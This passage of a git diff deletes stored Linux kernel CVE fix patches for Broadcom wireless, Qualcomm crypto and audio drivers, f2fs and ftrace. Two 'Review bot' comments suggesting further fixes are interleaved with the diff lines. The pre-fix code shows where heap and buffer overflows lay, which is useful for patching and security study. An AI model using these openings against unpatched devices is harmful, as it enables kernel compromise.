evlen; -+ if (evend != pktend) { - err = BCME_BADLEN; - goto done; - } -@@ -257,13 +260,15 @@ is_wlc_event_frame(void *pktdata, uint pktlen, uint16 exp_usr_subtype, - usr_subtype = ntoh16_ua((void *)&bcm_event->bcm_hdr.usr_subtype); - switch (usr_subtype) { - case BCMILCP_BCM_SUBTYPE_EVENT: -- if (pktlen < sizeof(bcm_event_t)) { -+ if ((pktlen < sizeof(bcm_event_t)) || -+ (evend < ((uint8 *)bcm_event + sizeof(bcm_event_t)))) { - err = BCME_BADLEN; - goto done; - } - -- len = sizeof(bcm_event_t) + ntoh32_ua((void *)&bcm_event->event.datalen); -- if ((uint8 *)pktdata + len > pktend) { -+ data_len = ntoh32_ua((void *)&bcm_event->event.datalen); -+ if ((sizeof(bcm_event_t) + data_len + -+ BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD) != pktlen) { - err = BCME_BADLEN; - goto done; - } -@@ -280,14 +285,16 @@ is_wlc_event_frame(void *pktdata, uint pktlen, uint16 exp_usr_subtype, - - break; - case BCMILCP_BCM_SUBTYPE_DNGLEVENT: -- if (pktlen < sizeof(bcm_dngl_event_t)) { -+ if (pktlen < sizeof(bcm_dngl_event_t) || -+ (evend < ((uint8 *)bcm_event + sizeof(bcm_dngl_event_t)))) { - err = BCME_BADLEN; - goto done; - } - -- len = sizeof(bcm_dngl_event_t) + -- ntoh16_ua((void *)&((bcm_dngl_event_t *)pktdata)->dngl_event.datalen); -- if ((uint8 *)pktdata + len > pktend) { -+ data_len = ntoh16_ua((void *)&((bcm_dngl_event_t *)pktdata) -+ ->dngl_event.datalen); -+ if ((sizeof(bcm_dngl_event_t) + data_len + -+ BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD) != pktlen) { - err = BCME_BADLEN; - goto done; - } -diff --git a/drivers/net/wireless/bcmdhd/include/proto/bcmeth.h b/drivers/net/wireless/bcmdhd/include/proto/bcmeth.h -old mode 100755 -new mode 100644 -index 41c1b57443c77..756f594bc61db ---- a/drivers/net/wireless/bcmdhd/include/proto/bcmeth.h -+++ b/drivers/net/wireless/bcmdhd/include/proto/bcmeth.h -@@ -93,6 +93,7 @@ - #define BCMILCP_BCM_SUBTYPE_DNGLEVENT 5 - #define BCMILCP_BCM_SUBTYPEHDR_MINLENGTH 8 - #define BCMILCP_BCM_SUBTYPEHDR_VERSION 0 -+#define BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD 2 - - /* 
These fields are stored in network order */ - typedef BWL_PRE_PACKED_STRUCT struct bcmeth_hdr diff --git a/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch deleted file mode 100644 index 3c5aa2b2..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch +++ /dev/null @@ -1,30 +0,0 @@ -diff --git a/sound/soc/tegra/tegra30_avp.c b/sound/soc/tegra/tegra30_avp.c -index 1a8c304..ef0616f 100644 ---- a/sound/soc/tegra/tegra30_avp.c -+++ b/sound/soc/tegra/tegra30_avp.c -@@ -276,7 +276,7 @@ - struct audio_engine_data *audio_engine; - const struct firmware *ucode_fw; - const struct tegra30_avp_ucode_desc *ucode_desc; -- int ucode_size = 0, ucode_offset = 0, total_ucode_size = 0; -+ ssize_t ucode_size = 0, ucode_offset = 0, total_ucode_size = 0; - int i, ret = 0; - - dev_vdbg(audio_avp->dev, "%s", __func__); -@@ -316,13 +316,14 @@ - } - - ucode_size = ucode_fw->size; -- if (ucode_size <= 0) { -+ if (ucode_size <= 0 || -+ ucode_size > avp_ucode_desc[i].max_mem_size) { - dev_err(audio_avp->dev, "Invalid ucode size."); - ret = -EINVAL; - release_firmware(ucode_fw); - goto err_param_mem_free; - } -- dev_vdbg(audio_avp->dev, "%s ucode size = %d bytes", -+ dev_vdbg(audio_avp->dev, "%s ucode size = %zd bytes", - ucode_desc->bin_name, ucode_size); - - /* Read ucode */ diff --git a/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch.base64 deleted file mode 100644 index 8e797830..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0744/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-0746/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0746/ANY/0001.patch deleted file mode 100644 index 91e061a0..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0746/ANY/0001.patch +++ /dev/null 
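Review bot: In the BCMILCP_BCM_SUBTYPE_EVENT branch of is_wlc_event_frame (bcmevent.c), the new test `(sizeof(bcm_event_t) + data_len + BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD) != pktlen` adds the 32-bit `data_len` taken from the frame before comparing. On a build where `size_t` is 32 bits the sum can wrap, so an oversized `datalen` may still compare equal to a short `pktlen`. Checking the minimum length first and comparing by subtraction avoids the wrap: require `pktlen >= sizeof(bcm_event_t) + BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD`, then test `data_len != pktlen - sizeof(bcm_event_t) - BCMILCP_BCM_SUBTYPE_EVENT_DATA_PAD`. The DNGLEVENT branch reads a 16-bit length and is not affected in the same way. The function body continues outside the hunks.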
@@ -1,43 +0,0 @@ -From a793531b751d8c3609e2bf1a5dc2c0f10e003632 Mon Sep 17 00:00:00 2001 -From: Utkarsh Saxena -Date: Tue, 25 Apr 2017 17:39:41 +0530 -Subject: [PATCH] msm: ipa: Fix for missing int overflow check in the refcount - library - -Overflow of reference counter can lead to memory leak. - -Before incrementing the reference count, check with -U32_MAX and return for error check. - -Bug: 35467471 -Change-Id: Ib96d36574ee086ec73c9836110cb2c98e8ae3d66 -Acked-by: Mohammed Javid -Signed-off-by: Utkarsh Saxena ---- - drivers/platform/msm/ipa/ipa_rt.c | 6 ++++++ - 1 file changed, 6 insertions(+) - -diff --git a/drivers/platform/msm/ipa/ipa_rt.c b/drivers/platform/msm/ipa/ipa_rt.c -index 47767cdafa70f..81c6331da8a54 100644 ---- a/drivers/platform/msm/ipa/ipa_rt.c -+++ b/drivers/platform/msm/ipa/ipa_rt.c -@@ -1289,6 +1289,10 @@ int ipa_get_rt_tbl(struct ipa_ioc_get_rt_tbl *lookup) - mutex_lock(&ipa_ctx->lock); - entry = __ipa_find_rt_tbl(lookup->ip, lookup->name); - if (entry && entry->cookie == IPA_COOKIE) { -+ if (entry->ref_cnt == ((u32)~0U)) { -+ IPAERR("fail: ref count crossed limit\n"); -+ goto ret; -+ } - entry->ref_cnt++; - lookup->hdl = entry->id; - -@@ -1298,6 +1302,8 @@ int ipa_get_rt_tbl(struct ipa_ioc_get_rt_tbl *lookup) - - result = 0; - } -+ -+ret: - mutex_unlock(&ipa_ctx->lock); - - return result; diff --git a/Patches/Linux_CVEs/CVE-2017-0747/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0747/ANY/0001.patch deleted file mode 100644 index 01d079ae..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0747/ANY/0001.patch +++ /dev/null 
@@ -1,47 +0,0 @@ -From c0021edb9ee6b2a37322cd6cf6ebdf160d09b8d7 Mon Sep 17 00:00:00 2001 -From: Brahmaji K -Date: Mon, 15 May 2017 16:02:15 +0530 -Subject: qcdev: Check the digest length during the SHA operations - -Check the digest length to avoid buffer overflow while -doing the SHA operations. - -Change-Id: I4d3fb20723f59e905a672edaf84ee5d0865905b1 -Signed-off-by: Brahmaji K ---- - drivers/crypto/msm/qcedev.c | 12 ++++++++++++ - 1 file changed, 12 insertions(+) - -diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c -index d04ca6f..beeb99e 100644 ---- a/drivers/crypto/msm/qcedev.c -+++ b/drivers/crypto/msm/qcedev.c -@@ -1741,6 +1741,12 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - mutex_unlock(&hash_access_lock); - return err; - } -+ if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) { -+ pr_err("Invalid sha_ctxt.diglen %d\n", -+ handle->sha_ctxt.diglen); -+ mutex_unlock(&hash_access_lock); -+ return -EINVAL; -+ } - qcedev_areq.sha_op_req.diglen = handle->sha_ctxt.diglen; - memcpy(&qcedev_areq.sha_op_req.digest[0], - &handle->sha_ctxt.digest[0], -@@ -1777,6 +1783,12 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - mutex_unlock(&hash_access_lock); - return err; - } -+ if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) { -+ pr_err("Invalid sha_ctxt.diglen %d\n", -+ handle->sha_ctxt.diglen); -+ mutex_unlock(&hash_access_lock); -+ return -EINVAL; -+ } - qcedev_areq.sha_op_req.diglen = handle->sha_ctxt.diglen; - memcpy(&qcedev_areq.sha_op_req.digest[0], - &handle->sha_ctxt.digest[0], --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0748/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0748/ANY/0001.patch deleted file mode 100644 index 0bb69f99..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0748/ANY/0001.patch +++ /dev/null 
@@ -1,41 +0,0 @@ -From 43ff88a8336310e665941dea6ffec77cc8314706 Mon Sep 17 00:00:00 2001 -From: kunleiz -Date: Fri, 14 Apr 2017 10:28:42 +0800 -Subject: [PATCH] ASoC: msm: qdspv2: add result check when audio process fail - -A audio_process_event_req is not always to success. Therefore, -check the return value for audio_process_event_req, and -initializ usr_evt before using it. - -CRs-Fixed: 2029798 -Bug: 35764875 -Change-Id: I4adf682575f5f9233a1a1a533f9c6361af8a5bcf -Signed-off-by: kunleiz ---- - drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 6 ++++++ - 1 file changed, 6 insertions(+) - -diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c -index ea1cb510a97fa..59f40806ee2be 100644 ---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c -+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c -@@ -842,6 +842,7 @@ static long audio_aio_process_event_req_compat(struct q6audio_aio *audio, - long rc; - struct msm_audio_event32 usr_evt_32; - struct msm_audio_event usr_evt; -+ memset(&usr_evt, 0, sizeof(struct msm_audio_event)); - - if (copy_from_user(&usr_evt_32, arg, - sizeof(struct msm_audio_event32))) { -@@ -851,6 +852,11 @@ static long audio_aio_process_event_req_compat(struct q6audio_aio *audio, - usr_evt.timeout_ms = usr_evt_32.timeout_ms; - - rc = audio_aio_process_event_req_common(audio, &usr_evt); -+ if (rc < 0) { -+ pr_err("%s: audio process event failed, rc = %ld", -+ __func__, rc); -+ return rc; -+ } - - usr_evt_32.event_type = usr_evt.event_type; - switch (usr_evt_32.event_type) { diff --git a/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch deleted file mode 100644 index 3d72e02b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch +++ /dev/null 
@@ -1,217 +0,0 @@ -diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c -index 31c47d0..cbeae57 100644 ---- a/kernel/trace/trace.c -+++ b/kernel/trace/trace.c -@@ -1282,11 +1282,11 @@ - - #define SAVED_CMDLINES_DEFAULT 128 - #define NO_CMDLINE_MAP UINT_MAX --static unsigned saved_tgids[SAVED_CMDLINES_DEFAULT]; - static arch_spinlock_t trace_cmdline_lock = __ARCH_SPIN_LOCK_UNLOCKED; - struct saved_cmdlines_buffer { - unsigned map_pid_to_cmdline[PID_MAX_DEFAULT+1]; - unsigned *map_cmdline_to_pid; -+ unsigned *map_cmdline_to_tgid; - unsigned cmdline_num; - int cmdline_idx; - char *saved_cmdlines; -@@ -1320,12 +1320,23 @@ - return -ENOMEM; - } - -+ s->map_cmdline_to_tgid = kmalloc_array(val, -+ sizeof(*s->map_cmdline_to_tgid), -+ GFP_KERNEL); -+ if (!s->map_cmdline_to_tgid) { -+ kfree(s->map_cmdline_to_pid); -+ kfree(s->saved_cmdlines); -+ return -ENOMEM; -+ } -+ - s->cmdline_idx = 0; - s->cmdline_num = val; - memset(&s->map_pid_to_cmdline, NO_CMDLINE_MAP, - sizeof(s->map_pid_to_cmdline)); - memset(s->map_cmdline_to_pid, NO_CMDLINE_MAP, - val * sizeof(*s->map_cmdline_to_pid)); -+ memset(s->map_cmdline_to_tgid, NO_CMDLINE_MAP, -+ val * sizeof(*s->map_cmdline_to_tgid)); - - return 0; - } -@@ -1491,14 +1502,17 @@ - if (!tsk->pid || unlikely(tsk->pid > PID_MAX_DEFAULT)) - return 0; - -+ preempt_disable(); - /* - * It's not the end of the world if we don't get - * the lock, but we also don't want to spin - * nor do we want to disable interrupts, - * so if we miss here, then better luck next time. 
- */ -- if (!arch_spin_trylock(&trace_cmdline_lock)) -+ if (!arch_spin_trylock(&trace_cmdline_lock)) { -+ preempt_enable(); - return 0; -+ } - - idx = savedcmd->map_pid_to_cmdline[tsk->pid]; - if (idx == NO_CMDLINE_MAP) { -@@ -1521,8 +1535,9 @@ - } - - set_cmdline(idx, tsk->comm); -- saved_tgids[idx] = tsk->tgid; -+ savedcmd->map_cmdline_to_tgid[idx] = tsk->tgid; - arch_spin_unlock(&trace_cmdline_lock); -+ preempt_enable(); - - return 1; - } -@@ -1564,19 +1579,29 @@ - preempt_enable(); - } - --int trace_find_tgid(int pid) -+static int __find_tgid_locked(int pid) - { - unsigned map; - int tgid; - -- preempt_disable(); -- arch_spin_lock(&trace_cmdline_lock); - map = savedcmd->map_pid_to_cmdline[pid]; - if (map != NO_CMDLINE_MAP) -- tgid = saved_tgids[map]; -+ tgid = savedcmd->map_cmdline_to_tgid[map]; - else - tgid = -1; - -+ return tgid; -+} -+ -+int trace_find_tgid(int pid) -+{ -+ int tgid; -+ -+ preempt_disable(); -+ arch_spin_lock(&trace_cmdline_lock); -+ -+ tgid = __find_tgid_locked(pid); -+ - arch_spin_unlock(&trace_cmdline_lock); - preempt_enable(); - -@@ -3877,10 +3902,15 @@ - { - char buf[64]; - int r; -+ unsigned int n; - -+ preempt_disable(); - arch_spin_lock(&trace_cmdline_lock); -- r = scnprintf(buf, sizeof(buf), "%u\n", savedcmd->cmdline_num); -+ n = savedcmd->cmdline_num; - arch_spin_unlock(&trace_cmdline_lock); -+ preempt_enable(); -+ -+ r = scnprintf(buf, sizeof(buf), "%u\n", n); - - return simple_read_from_buffer(ubuf, cnt, ppos, buf, r); - } -@@ -3889,6 +3919,7 @@ - { - kfree(s->saved_cmdlines); - kfree(s->map_cmdline_to_pid); -+ kfree(s->map_cmdline_to_tgid); - kfree(s); - } - -@@ -3905,10 +3936,12 @@ - return -ENOMEM; - } - -+ preempt_disable(); - arch_spin_lock(&trace_cmdline_lock); - savedcmd_temp = savedcmd; - savedcmd = s; - arch_spin_unlock(&trace_cmdline_lock); -+ preempt_enable(); - free_saved_cmdlines_buffer(savedcmd_temp); - - return 0; -@@ -3951,33 +3984,61 @@ - char *file_buf; - char *buf; - int len = 0; -- int pid; - int i; -+ int 
*pids; -+ int n = 0; - -- file_buf = kmalloc(SAVED_CMDLINES_DEFAULT*(16+1+16), GFP_KERNEL); -- if (!file_buf) -+ preempt_disable(); -+ arch_spin_lock(&trace_cmdline_lock); -+ -+ pids = kmalloc_array(savedcmd->cmdline_num, 2*sizeof(int), GFP_KERNEL); -+ if (!pids) { -+ arch_spin_unlock(&trace_cmdline_lock); -+ preempt_enable(); - return -ENOMEM; -+ } - -- buf = file_buf; -- -- for (i = 0; i < SAVED_CMDLINES_DEFAULT; i++) { -- int tgid; -- int r; -+ for (i = 0; i < savedcmd->cmdline_num; i++) { -+ int pid; - - pid = savedcmd->map_cmdline_to_pid[i]; - if (pid == -1 || pid == NO_CMDLINE_MAP) - continue; - -- tgid = trace_find_tgid(pid); -- r = sprintf(buf, "%d %d\n", pid, tgid); -+ pids[n] = pid; -+ pids[n+1] = __find_tgid_locked(pid); -+ n += 2; -+ } -+ arch_spin_unlock(&trace_cmdline_lock); -+ preempt_enable(); -+ -+ if (n == 0) { -+ kfree(pids); -+ return 0; -+ } -+ -+ /* enough to hold max pair of pids + space, lr and nul */ -+ len = n * 12; -+ file_buf = kmalloc(len, GFP_KERNEL); -+ if (!file_buf) { -+ kfree(pids); -+ return -ENOMEM; -+ } -+ -+ buf = file_buf; -+ for (i = 0; i < n && len > 0; i += 2) { -+ int r; -+ -+ r = snprintf(buf, len, "%d %d\n", pids[i], pids[i+1]); - buf += r; -- len += r; -+ len -= r; - } - - len = simple_read_from_buffer(ubuf, cnt, ppos, -- file_buf, len); -+ file_buf, buf - file_buf); - - kfree(file_buf); -+ kfree(pids); - - return len; - } diff --git a/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch.base64 deleted file mode 100644 index 42806cb7..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0749/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-0750/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0750/ANY/0001.patch deleted file mode 100644 index 68f42d9f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0750/ANY/0001.patch +++ /dev/null 
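Review bot: In the last kernel/trace/trace.c hunk, `pids = kmalloc_array(savedcmd->cmdline_num, 2*sizeof(int), GFP_KERNEL)` is called after `preempt_disable()` and `arch_spin_lock(&trace_cmdline_lock)`, and a GFP_KERNEL allocation may sleep, which is not allowed in that context. The size can be read under the lock, the lock dropped for the allocation, and the copy loop bounded by both the snapshot and the current `cmdline_num`, as in the excerpt below. Separately, the formatting loop advances `buf` by the return value of `snprintf`, which is the untruncated length, so `buf - file_buf` can exceed the allocation if a line is ever cut short; `r = scnprintf(buf, len, "%d %d\n", pids[i], pids[i+1]);` returns what was actually written. The enclosing function starts and ends outside the hunk.

```c
	/* … unchanged: declarations … */
	unsigned int num;

	/* Snapshot the table size, then allocate with the lock dropped. */
	preempt_disable();
	arch_spin_lock(&trace_cmdline_lock);
	num = savedcmd->cmdline_num;
	arch_spin_unlock(&trace_cmdline_lock);
	preempt_enable();

	pids = kmalloc_array(num, 2*sizeof(int), GFP_KERNEL);
	if (!pids)
		return -ENOMEM;

	preempt_disable();
	arch_spin_lock(&trace_cmdline_lock);
	/* savedcmd may have been swapped meanwhile; never walk past num. */
	for (i = 0; i < savedcmd->cmdline_num && i < num; i++) {
		/* … unchanged: pid lookup and pids[n], pids[n+1] fill … */
```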
@@ -1,44 +0,0 @@ -From 3f0531e5775303091a1ff975cdd572cc6a935321 Mon Sep 17 00:00:00 2001 -From: Jin Qian -Date: Mon, 24 Apr 2017 18:20:52 -0700 -Subject: [PATCH] BACKPORT: f2fs: sanity check log_blocks_per_seg - -f2fs currently only supports 4KB block size and 2MB segment size. -Sanity check log_blocks_per_seg == 9, i.e. 2MB/4KB = (1 << 9) - -Partially -(cherry-picked from commit 9a59b62fd88196844cee5fff851bee2cfd7afb6e) - -f2fs: do more integrity verification for superblock - -Do more sanity check for superblock during ->mount. - -Signed-off-by: Chao Yu -Signed-off-by: Jaegeuk Kim - -Bug: 36817013 -Change-Id: I0be52e54fba82083068337ceb9f7ad985a87319f -Signed-off-by: Jin Qian ---- - fs/f2fs/super.c | 8 ++++++++ - 1 file changed, 8 insertions(+) - -diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c -index 3a65e01323528..98a77b0a365d9 100644 ---- a/fs/f2fs/super.c -+++ b/fs/f2fs/super.c -@@ -947,6 +947,14 @@ static int sanity_check_raw_super(struct super_block *sb, - return 1; - } - -+ /* check log blocks per segment */ -+ if (le32_to_cpu(raw_super->log_blocks_per_seg) != 9) { -+ f2fs_msg(sb, KERN_INFO, -+ "Invalid log blocks per segment (%u)\n", -+ le32_to_cpu(raw_super->log_blocks_per_seg)); -+ return 1; -+ } -+ - /* Currently, support 512/1024/2048/4096 bytes sector size */ - if (le32_to_cpu(raw_super->log_sectorsize) > - F2FS_MAX_LOG_SECTOR_SIZE || diff --git a/Patches/Linux_CVEs/CVE-2017-0751/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0751/ANY/0001.patch deleted file mode 100644 index 1bc956f1..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0751/ANY/0001.patch +++ /dev/null 
@@ -1,47 +0,0 @@ -From ee4aa31b9f24c28064e509e22c1f9013df768f5f Mon Sep 17 00:00:00 2001 -From: Dennis Cagle -Date: Wed, 31 May 2017 16:28:01 -0700 -Subject: [PATCH] qcdev: Check the digest length during the SHA operations - -Check the digest length to avoid buffer overflow while -doing the SHA operations. - -Bug: 36591162 -CRs-Fixed: 2045061 -Change-Id: I4d3fb20723f59e905a672edaf84ee5d0865905b1 -Signed-off-by: Brahmaji K -Signed-off-by: Dennis Cagle ---- - drivers/crypto/msm/qcedev.c | 12 ++++++++++++ - 1 file changed, 12 insertions(+) - -diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c -index ef4b5e15b4fad..f42d19a5cf59e 100644 ---- a/drivers/crypto/msm/qcedev.c -+++ b/drivers/crypto/msm/qcedev.c -@@ -1709,6 +1709,12 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - err = qcedev_hash_final(&qcedev_areq, handle); - if (err) - return err; -+ -+ if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) { -+ pr_err("Invalid sha_ctxt.diglen %d\n", -+ handle->sha_ctxt.diglen); -+ return -EINVAL; -+ } - qcedev_areq.sha_op_req.diglen = handle->sha_ctxt.diglen; - memcpy(&qcedev_areq.sha_op_req.digest[0], - &handle->sha_ctxt.digest[0], -@@ -1737,6 +1743,12 @@ long qcedev_ioctl(struct file *file, unsigned cmd, unsigned long arg) - err = qcedev_hash_final(&qcedev_areq, handle); - if (err) - return err; -+ -+ if (handle->sha_ctxt.diglen > QCEDEV_MAX_SHA_DIGEST) { -+ pr_err("Invalid sha_ctxt.diglen %d\n", -+ handle->sha_ctxt.diglen); -+ return -EINVAL; -+ } - qcedev_areq.sha_op_req.diglen = handle->sha_ctxt.diglen; - memcpy(&qcedev_areq.sha_op_req.digest[0], - &handle->sha_ctxt.digest[0], diff --git a/Patches/Linux_CVEs/CVE-2017-0786/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0786/ANY/0001.patch deleted file mode 100644 index 6051a676..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0786/ANY/0001.patch +++ /dev/null 
@@ -1,41 +0,0 @@
-From 68acc6ab1474e9dde68880a7856e8a74ff86aa19 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Mon, 5 Jun 2017 10:21:10 -0700
-Subject: net: wireless: bcmdhd: adding boudary check in wl_escan_handler
-
-WLC_E_ESCAN_RESULT event could be manipulated especially two length field
-inside, one is for escan_result buffer length and another one is
-bss_info length, the forged fields may bypass current length check and
-corrupt kernel heap memory.
-
-so added checking validation for two length fields in WLC_E_ESCAN_RESULT
-event.
-
-Signed-off-by: Insun Song
-Bug: 37351060
-Change-Id: I31e9fccc48fc06278fb3a87a76ef7337296c2b0d
----
- drivers/net/wireless/bcmdhd/wl_cfg80211.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index 021f69f7..d8c748d 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -10513,6 +10513,13 @@ static s32 wl_escan_handler(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- WL_ERR(("Invalid escan result (NULL pointer)\n"));
- goto exit;
- }
-+ if ((dtoh32(escan_result->buflen) > ESCAN_BUF_SIZE) ||
-+ (dtoh32(escan_result->buflen) <
-+ sizeof(wl_escan_result_t))) {
-+ WL_ERR(("Invalid escan buffer len:%d\n",
-+ dtoh32(escan_result->buflen)));
-+ goto exit;
-+ }
- if (dtoh16(escan_result->bss_count) != 1) {
- WL_ERR(("Invalid bss_count %d: ignoring\n", escan_result->bss_count));
- goto exit;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0787/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0787/ANY/0001.patch
deleted file mode 100644
index 8acfe027..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0787/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 08ccf853c567bf02f4a5c9f9aef19a40ecdf57d1 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Mon, 5 Jun 2017 14:39:26 -0700
-Subject: net: wireless: bcmdhd: adding boundary check for pfn events
-
-adding boundary check for bssid count in dhd_pno_process_epno_result
-and dhd_handle_hotlist_scan_evt function to prevent heap overflow.
-
-Signed-off-by: Insun Song
-Bug: 37722328
-Bug: 37722970
-Change-Id: I1f0bc25ef4e7f5ba8f1aa9d9271919ee84d780a1
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 16 ++++++++++++++--
- 1 file changed, 14 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 8ebdf53..1a8e4ee 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -92,6 +92,11 @@
- #define ENTRY_OVERHEAD strlen("bssid=\nssid=\nfreq=\nlevel=\nage=\ndist=\ndistSd=\n====")
- #define TIME_MIN_DIFF 5
-
-+#define EVENT_DATABUF_MAXLEN (512 - sizeof(bcm_event_t))
-+#define EVENT_MAX_NETCNT \
-+ ((EVENT_DATABUF_MAXLEN - sizeof(wl_pfn_scanresults_t)) \
-+ / sizeof(wl_pfn_net_info_t) + 1)
-+
- #ifdef GSCAN_SUPPORT
- static int _dhd_pno_flush_ssid(dhd_pub_t *dhd);
- static wl_pfn_gscan_ch_bucket_cfg_t *
-@@ -3575,7 +3580,12 @@ dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, uint32 event, int
- if (event == WLC_E_PFN_NET_FOUND || event == WLC_E_PFN_NET_LOST) {
- wl_pfn_scanresults_t *pfn_result = (wl_pfn_scanresults_t *)data;
- wl_pfn_net_info_t *net;
--
-+ if ((pfn_result->count == 0) ||
-+ (pfn_result->count > EVENT_MAX_NETCNT)) {
-+ DHD_ERROR(("%s event %d: incorrect results count:%d\n",
-+ __FUNCTION__, event, pfn_result->count));
-+ return NULL;
-+ }
- if (pfn_result->version != PFN_SCANRESULT_VERSION) {
- DHD_ERROR(("%s event %d: Incorrect version %d %d\n", __FUNCTION__, event,
- pfn_result->version, PFN_SCANRESULT_VERSION));
-@@ -3690,7 +3700,9 @@ void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, int *s
-
- gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);
-
-- if (!results->count) {
-+ if ((results->count == 0) || (results->count > EVENT_MAX_NETCNT)) {
-+ DHD_ERROR(("%s: wrong count:%d\n", __FUNCTION__,
-+ results->count));
- *send_evt_bytes = 0;
- return ptr;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0788/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0788/ANY/0001.patch
deleted file mode 100644
index 8acfe027..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0788/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 08ccf853c567bf02f4a5c9f9aef19a40ecdf57d1 Mon Sep 17 00:00:00 2001
-From: Insun Song
-Date: Mon, 5 Jun 2017 14:39:26 -0700
-Subject: net: wireless: bcmdhd: adding boundary check for pfn events
-
-adding boundary check for bssid count in dhd_pno_process_epno_result
-and dhd_handle_hotlist_scan_evt function to prevent heap overflow.
-
-Signed-off-by: Insun Song
-Bug: 37722328
-Bug: 37722970
-Change-Id: I1f0bc25ef4e7f5ba8f1aa9d9271919ee84d780a1
----
- drivers/net/wireless/bcmdhd/dhd_pno.c | 16 ++++++++++++++--
- 1 file changed, 14 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 8ebdf53..1a8e4ee 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -92,6 +92,11 @@
- #define ENTRY_OVERHEAD strlen("bssid=\nssid=\nfreq=\nlevel=\nage=\ndist=\ndistSd=\n====")
- #define TIME_MIN_DIFF 5
-
-+#define EVENT_DATABUF_MAXLEN (512 - sizeof(bcm_event_t))
-+#define EVENT_MAX_NETCNT \
-+ ((EVENT_DATABUF_MAXLEN - sizeof(wl_pfn_scanresults_t)) \
-+ / sizeof(wl_pfn_net_info_t) + 1)
-+
- #ifdef GSCAN_SUPPORT
- static int _dhd_pno_flush_ssid(dhd_pub_t *dhd);
- static wl_pfn_gscan_ch_bucket_cfg_t *
-@@ -3575,7 +3580,12 @@ dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, uint32 event, int
- if (event == WLC_E_PFN_NET_FOUND || event == WLC_E_PFN_NET_LOST) {
